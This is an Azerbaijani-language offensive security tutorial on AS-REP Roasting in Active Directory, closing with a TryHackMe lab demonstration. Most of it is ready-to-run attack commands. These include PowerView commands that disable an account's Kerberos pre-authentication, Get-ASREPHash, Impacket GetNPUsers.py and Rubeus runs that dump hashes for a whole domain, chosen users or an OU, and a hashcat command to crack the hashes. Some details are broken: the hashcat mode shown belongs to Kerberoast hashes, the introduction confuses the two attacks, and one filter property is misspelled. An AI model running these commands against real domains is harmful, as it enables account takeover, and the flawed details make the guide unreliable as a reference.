ASREPRoast

Kerberoasting'də hücumçu xidmət hesablarını hədəf alır. Hücumda məntiqi odur ki, hesablar üçün xidmət biletlərinin pre-autentifikasiya olmadan tələb edilməsi mümkündür. Kerberoasting'dən fərqli olaraq, AS-REP Roasting daha geniş hədəf dairəsinə malikdir. O, xidmət hesabları olub-olmamasından asılı olmayaraq, pre-autentifikasiyası deaktiv edilmiş istifadəçi hesabları üçün krbasrep5 hashlərinin çıxarmaq üçün istifadə edilir.

Pre-autentifikasiya zamanı istifadəçilərin hashı, timestamp'ı şifrələmək üçün istifadə olunur. Domen nəzarətçis düzgün hashın istifadə edildiyini və əvvəlki sorğunu təkrarlamadığını təsdiqləmək üçün şifrəni açır. KDC timestamp'ı təsdiq etdikdən sonra istifadəçi üçün TGT verir. Pre-autentifikasiya deaktiv edilərsə, istənilən istifadəçi üçün hər hansı autentifikasiya məlumatını tələb etmək mümkündür. Bu istək sayəsində, KDC oflayn rejimdə sındırıla bilən şifrələnmiş TGT'i qaytarır, çünki istifadəçinin həqiqətən kim olduğunu təsdiqləmək addımını atlayır.

PowerView ilə Pre-Autentifikasiyanın Deaktiv edilməsi

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}

Bu əmr, Invoke-ACLScanner PowerShell modulundan istifadə edərək GUID-ləri (Qlobal Unikal İdentifikatorlar) resolve edir və IdentityReferenceName dəyərinin "RDPUsers"ə uyğun olduğu nəticələri filtrləyin.

#Kerberos pre-autentifikasiyasını deaktiv edir
Set-DomainObject -Identity <UserAccount> -XOR @{useraccountcontrol=4194304} -Verbose

#Dəyərin dəyişib-dəyişmədiyini yoxlamaq üçün
Get-DomainUser -PreauthNotRequired -Verbose

ASREPRoast Aləti ilə Hücum

Burdan yükləyə bilərsiniz.

#Xüusui hesabın hash'nin əldə edilməsi
Get-ASREPHash -UserName <UserName> -Verbose

#İstənilən ASREProastable İstifadəçinin hashlərinin əldə edilməsi
Invoke-ASREPRoast -Verbose

Impacket ilə Hücum

Burdan yükləyə biləriniz.

python GetNPUsers.py <domain_name>/ -usersfile <users_file> -outputfile <FileName>

Bu əmr, GetNPUsers.py skriptinindən istifadə edərək, verilən istifadəçi faylına əsasən bir domenə ASREPRoast hücumu edir və nəticəni bir çıxış faylında saxlayır.

Rubeus ilə Hücum

#Bütün domen istifadəçilərinə hücum
Rubeus.exe asreproast /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>

#Xüsusi istifadəçilərə ASREPRoast hücumu
Rubeus.exe asreproast /user:<username> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>

#Xüsusi OU (Organization Unit) istifadəçilərinə ASREPRoast hücumu
Rubeus.exe asreproast /ou:<OUName> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>

Praktiki nümayiş

Praktikada istifadə edəcəyim TryHackMe lab'ı üçün bu keçiddən istifadə edə bilərsiniz.

Rubeus.exe asreproast - Bu, həssas istifadəçiləri təyin edən AS-REP Roast əmrini işlə salacaq və aşkar edilmiş həssas istifadəçi heşlərini çıxaracaq.

İndi isə aşağıdakı hashcat əmri ilə plaintext parolu əldə etməyə çalışıram:

hashcat -m 13100 -a 0 hash.txt Pass.txt

Və parol uğurla əldə edilir!

Last updated